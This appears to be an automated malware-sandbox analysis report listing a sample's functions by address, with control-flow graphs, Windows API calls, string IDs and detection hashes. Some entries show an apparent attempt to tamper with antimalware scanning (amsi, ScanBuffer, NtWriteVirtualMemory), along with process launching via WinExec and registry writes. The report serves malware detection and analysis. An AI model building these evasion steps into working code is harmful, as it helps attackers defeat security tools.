                                                                                              control_flow_graph 13139 31c1724-31c1736 13140 31c173c-31c174c 13139->13140 13141 31c1968-31c196d 13139->13141 13142 31c174e-31c175b 13140->13142 13143 31c17a4-31c17ad 13140->13143 13144 31c1a80-31c1a83 13141->13144 13145 31c1973-31c1984 13141->13145 13148 31c175d-31c176a 13142->13148 13149 31c1774-31c1780 13142->13149 13143->13142 13152 31c17af-31c17bb 13143->13152 13146 31c1a89-31c1a8b 13144->13146 13147 31c1684-31c16ad VirtualAlloc 13144->13147 13150 31c1938-31c1945 13145->13150 13151 31c1986-31c19a2 13145->13151 13153 31c16df-31c16e5 13147->13153 13154 31c16af-31c16dc call 31c1644 13147->13154 13155 31c176c-31c1770 13148->13155 13156 31c1794-31c17a1 13148->13156 13158 31c17f0-31c17f9 13149->13158 13159 31c1782-31c1790 13149->13159 13150->13151 13157 31c1947-31c195b Sleep 13150->13157 13160 31c19a4-31c19ac 13151->13160 13161 31c19b0-31c19bf 13151->13161 13152->13142 13162 31c17bd-31c17c9 13152->13162 13154->13153 13157->13151 13169 31c195d-31c1964 Sleep 13157->13169 13167 31c182c-31c1836 13158->13167 13168 31c17fb-31c1808 13158->13168 13170 31c1a0c-31c1a22 13160->13170 13163 31c19d8-31c19e0 13161->13163 13164 31c19c1-31c19d5 13161->13164 13162->13142 13165 31c17cb-31c17de Sleep 13162->13165 13172 31c19fc-31c19fe call 31c15cc 13163->13172 13173 31c19e2-31c19fa 13163->13173 13164->13170 13165->13142 13171 31c17e4-31c17eb Sleep 13165->13171 13176 31c18a8-31c18b4 13167->13176 13177 31c1838-31c1863 13167->13177 13168->13167 13175 31c180a-31c181e Sleep 13168->13175 13169->13150 13178 31c1a3b-31c1a47 13170->13178 13179 31c1a24-31c1a32 13170->13179 13171->13143 13180 31c1a03-31c1a0b 13172->13180 13173->13180 13175->13167 13182 31c1820-31c1827 Sleep 13175->13182 13188 31c18dc-31c18eb call 31c15cc 13176->13188 13189 31c18b6-31c18c8 13176->13189 13183 31c187c-31c188a 13177->13183 13184 31c1865-31c1873 13177->13184 13186 31c1a68 13178->13186 13187 31c1a49-31c1a5c 13178->13187 13179->13178 13185 31c1a34 13179->13185 13182->13168 13194 31c188c-31c18a6 call 31c1500 13183->13194 13195 31c18f8 13183->13195 13184->13183 13193 31c1875 13184->13193 13185->13178 13196 31c1a6d-31c1a7f 13186->13196 13187->13196 13197 31c1a5e-31c1a63 call 31c1500 13187->13197 13198 31c18fd-31c1936 13188->13198 13202 31c18ed-31c18f7 13188->13202 13190 31c18cc-31c18da 13189->13190 13191 31c18ca 13189->13191 13190->13198 13191->13190 13193->13183 13194->13198 13195->13198 13197->13196
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?,031C2000), ref: 031C17D0
                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,031C2000), ref: 031C17E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 6008ec0d3d48f8ddc556e197f0afe9f6dd259239c76b220a44ebfe04593b490c
                                                                                              • Instruction ID: 49b6ba351c12270eabd592fc878a7bbe48b296a382f44ad307d7e475c28d3ffc
                                                                                              • Opcode Fuzzy Hash: 6008ec0d3d48f8ddc556e197f0afe9f6dd259239c76b220a44ebfe04593b490c
                                                                                              • Instruction Fuzzy Hash: D6B1217A650780ABCB15EF69E988355FBE0FB9A310F19C2BED4058F38AC7749442C790
                                                                                              Function 031D88B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 031D88C1
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                                • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 031D8920
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                              • String ID: DllGetClassObject$W$amsi
                                                                                              • API String ID: 941070894-2671292670
                                                                                              • Opcode ID: 8ab3092199a580f4f0810a3977c5e5740e984d9610fa58905996e483bf942be4
                                                                                              • Instruction ID: fda63a92096a43f0192ce814d9286739185bdbc0525e83265e2dd6f222c66637
                                                                                              • Opcode Fuzzy Hash: 8ab3092199a580f4f0810a3977c5e5740e984d9610fa58905996e483bf942be4
                                                                                              • Instruction Fuzzy Hash: 18F0879044C381BBC200E6B88C45F4FBACC4BAA164F448A18B1E8AA2D2D77AD10583A7
                                                                                              Function 031C1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 13227 31c1a8c-31c1a9b 13228 31c1b6c-31c1b6f 13227->13228 13229 31c1aa1-31c1aa5 13227->13229 13230 31c1c5c-31c1c60 13228->13230 13231 31c1b75-31c1b7f 13228->13231 13232 31c1b08-31c1b11 13229->13232 13233 31c1aa7-31c1aae 13229->13233 13238 31c16e8-31c170b call 31c1644 VirtualFree 13230->13238 13239 31c1c66-31c1c6b 13230->13239 13234 31c1b3c-31c1b49 13231->13234 13235 31c1b81-31c1b8d 13231->13235 13232->13233 13240 31c1b13-31c1b27 Sleep 13232->13240 13236 31c1adc-31c1ade 13233->13236 13237 31c1ab0-31c1abb 13233->13237 13234->13235 13241 31c1b4b-31c1b5f Sleep 13234->13241 13242 31c1b8f-31c1b92 13235->13242 13243 31c1bc4-31c1bd2 13235->13243 13246 31c1ae0-31c1af1 13236->13246 13247 31c1af3 13236->13247 13244 31c1abd-31c1ac2 13237->13244 13245 31c1ac4-31c1ad9 13237->13245 13255 31c170d-31c1714 13238->13255 13256 31c1716 13238->13256 13240->13233 13249 31c1b2d-31c1b38 Sleep 13240->13249 13241->13235 13251 31c1b61-31c1b68 Sleep 13241->13251 13252 31c1b96-31c1b9a 13242->13252 13243->13252 13254 31c1bd4-31c1bd9 call 31c14c0 13243->13254 13246->13247 13253 31c1af6-31c1b03 13246->13253 13247->13253 13249->13232 13251->13234 13257 31c1bdc-31c1be9 13252->13257 13258 31c1b9c-31c1ba2 13252->13258 13253->13231 13254->13252 13261 31c1719-31c1723 13255->13261 13256->13261 13257->13258 13260 31c1beb-31c1bf2 call 31c14c0 13257->13260 13262 31c1bf4-31c1bfe 13258->13262 13263 31c1ba4-31c1bc2 call 31c1500 13258->13263 13260->13258 13266 31c1c2c-31c1c59 call 31c1560 13262->13266 13267 31c1c00-31c1c28 VirtualFree 13262->13267
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?), ref: 031C1B17
                                                                                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 031C1B31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 779a84f47678a21e764b22ab85900d8649a15ff8fa9abc014735e4fb5de117ce
                                                                                              • Instruction ID: 9e51d632dc685ba80bf24570eb30016ce8419e67fdc26ff95207cbc26a5ac5ab
                                                                                              • Opcode Fuzzy Hash: 779a84f47678a21e764b22ab85900d8649a15ff8fa9abc014735e4fb5de117ce
                                                                                              • Instruction Fuzzy Hash: AB51ED796A03C0AFE715DF68D984756BBE4AB6A310F2881BED8048B387E770D445CB91
                                                                                              Function 031DE4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031DE5F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionInternet
                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                              • API String ID: 3847983778-3852638603
                                                                                              • Opcode ID: 827c368eb867f0724c2275cfe803d0076bfc2f615137e4cf9b132d92c2d399bc
                                                                                              • Instruction ID: 6bbed1d75c8cf67630094e88b842222e1d6bcc8b24bb310ded62a316b4623a4b
                                                                                              • Opcode Fuzzy Hash: 827c368eb867f0724c2275cfe803d0076bfc2f615137e4cf9b132d92c2d399bc
                                                                                              • Instruction Fuzzy Hash: 8E413D39B2835C9FDB12EBA5D851ADEB3B9EF9D601F204429E040AF244DF30AD018B65
                                                                                              Function 031D85BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • WinExec.KERNEL32(?,?), ref: 031D8624
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                              • String ID: Kernel32$WinExec
                                                                                              • API String ID: 2292790416-3609268280
                                                                                              • Opcode ID: cd0aa1fba0ba3a7269d6e667d5e2d4304459c18e89f707c30e4f9f00e10e353f
                                                                                              • Instruction ID: d2aa1d47d78b6c0d64cb5d6613c6d4e7ca0fdd99e8ddf9cae0ce4cf77bd5d64d
                                                                                              • Opcode Fuzzy Hash: cd0aa1fba0ba3a7269d6e667d5e2d4304459c18e89f707c30e4f9f00e10e353f
                                                                                              • Instruction Fuzzy Hash: AE013C79618748BFDB01EFE9EC12F5E7BADE74EA10F518460B910DA640EB74AD008A25
                                                                                              Function 031D85BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • WinExec.KERNEL32(?,?), ref: 031D8624
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                              • String ID: Kernel32$WinExec
                                                                                              • API String ID: 2292790416-3609268280
                                                                                              • Opcode ID: 74f3a65676f6cfe5261ec111d8963727215f78149d523705c4e4c75e5f735296
                                                                                              • Instruction ID: a589008521eeed88866390c24a5c2939782c805fb7e74878d256d18fb3f8cf5c
                                                                                              • Opcode Fuzzy Hash: 74f3a65676f6cfe5261ec111d8963727215f78149d523705c4e4c75e5f735296
                                                                                              • Instruction Fuzzy Hash: 74F04F79618748BFDB01FFE9EC12F5E7BADE74EA10F518460F910DA640EB74AD008A25
                                                                                              Function 031D5C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,031D5D74,?,?,031D3900,00000001), ref: 031D5C88
                                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,031D5D74,?,?,031D3900,00000001), ref: 031D5CB6
                                                                                                • Part of subcall function 031C7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,031D3900,031D5CF6,00000000,031D5D74,?,?,031D3900), ref: 031C7DAA
                                                                                                • Part of subcall function 031C7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,031D3900,031D5D11,00000000,031D5D74,?,?,031D3900,00000001), ref: 031C7FB7
                                                                                              • GetLastError.KERNEL32(00000000,031D5D74,?,?,031D3900,00000001), ref: 031D5D1B
                                                                                                • Part of subcall function 031CA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,031CC3D9,00000000,031CC433), ref: 031CA797
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                              • String ID:
                                                                                              • API String ID: 503785936-0
                                                                                              • Opcode ID: 993e9162c2331374ce41db6d2141dbdb149b82f11ac98688b2a451200280d178
                                                                                              • Instruction ID: 5cd3799ede61de5184bf5ce98243492592ff3ef33eda5cf3b4c94fd9956a3fa7
                                                                                              • Opcode Fuzzy Hash: 993e9162c2331374ce41db6d2141dbdb149b82f11ac98688b2a451200280d178
                                                                                              • Instruction Fuzzy Hash: A031B338A047899FDB01EFA8C8817DDBBF5AF1E700F508069D514AF380DB7559048BA1
                                                                                              Function 031DF212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,0333BA58), ref: 031DF258
                                                                                              • RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF290
                                                                                              • RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF29B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 779948276-0
                                                                                              • Opcode ID: 8a646a491d262940c4eb15864a770592ee30e87657d16fbc1b19fd915c872701
                                                                                              • Instruction ID: 08cd4b4e108d43d17fb3f75b23432ae40448a90cac345abfe53809da7e67e390
                                                                                              • Opcode Fuzzy Hash: 8a646a491d262940c4eb15864a770592ee30e87657d16fbc1b19fd915c872701
                                                                                              • Instruction Fuzzy Hash: 37116A79618388AFDB01EFA9D891E9EBBFCEB1C300F504429B404DB654DB30EE008B50
                                                                                              Function 031DF214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,0333BA58), ref: 031DF258
                                                                                              • RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF290
                                                                                              • RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF29B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 779948276-0
                                                                                              • Opcode ID: 2ec1a98859d80129217b147c314aec18ead659b26daf2735f1ec6163baf6276a
                                                                                              • Instruction ID: 66215147538bfe6899d6ba5051f5e3c203b2a62b9643400cf49955c05f32c09f
                                                                                              • Opcode Fuzzy Hash: 2ec1a98859d80129217b147c314aec18ead659b26daf2735f1ec6163baf6276a
                                                                                              • Instruction Fuzzy Hash: 08118C79618388AFDB01EFA9D891E9EBBFCEB1C300F504429F404DB654DB30EA008B50
                                                                                              Function 031CE364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 90f588012faa577b6bf270a08ac859a3486f47609fd39f2c6025e50af90de6e6
                                                                                              • Instruction ID: 2194f70144f3c57d4d6690273022e6bfb8a096b758b51043921776f2392e4936
                                                                                              • Opcode Fuzzy Hash: 90f588012faa577b6bf270a08ac859a3486f47609fd39f2c6025e50af90de6e6
                                                                                              • Instruction Fuzzy Hash: B9F0C268738280C7CB24FB39CD8456A27985F7C342714347EA40A9F105CB65ED86C3B3
                                                                                              Function 031C4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SysFreeString.OLEAUT32(031DF4A4), ref: 031C4C6E
                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 031C4D5B
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 031C4D6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Free$Alloc
                                                                                              • String ID:
                                                                                              • API String ID: 986138563-0
                                                                                              • Opcode ID: 14a39e70b1f36bc65fa893dbd8748944ab5609f9adeb0f78e0d3211148921afc
                                                                                              • Instruction ID: 5cb82894392228de8eb03fcea344f38ac1998289cbd96fade51cae6335cbee1c
                                                                                              • Opcode Fuzzy Hash: 14a39e70b1f36bc65fa893dbd8748944ab5609f9adeb0f78e0d3211148921afc
                                                                                              • Instruction Fuzzy Hash: EDE0E6FC1253856FEF15DF229D50A76A2299FED640B28446C9401CD164DB38D841552C
                                                                                              Function 031D70DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SysFreeString.OLEAUT32(?), ref: 031D73DA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID: H
                                                                                              • API String ID: 3341692771-2852464175
                                                                                              • Opcode ID: 66a4979ca4d9748bb100005ce78da06a5ada8dbfd7777618d4489a826eaa170b
                                                                                              • Instruction ID: 16325dc0a77af5691910808f8308f19b717bf148e05d59137f8f25dcad21ca44
                                                                                              • Opcode Fuzzy Hash: 66a4979ca4d9748bb100005ce78da06a5ada8dbfd7777618d4489a826eaa170b
                                                                                              • Instruction Fuzzy Hash: 09B1E279A01648AFDB15CF99D880A9DFBF6FF8E310F1581A9E845AB360D730A845CF50
                                                                                              Function 031CE760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 031CE781
                                                                                                • Part of subcall function 031CE364: VariantClear.OLEAUT32(?), ref: 031CE373
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
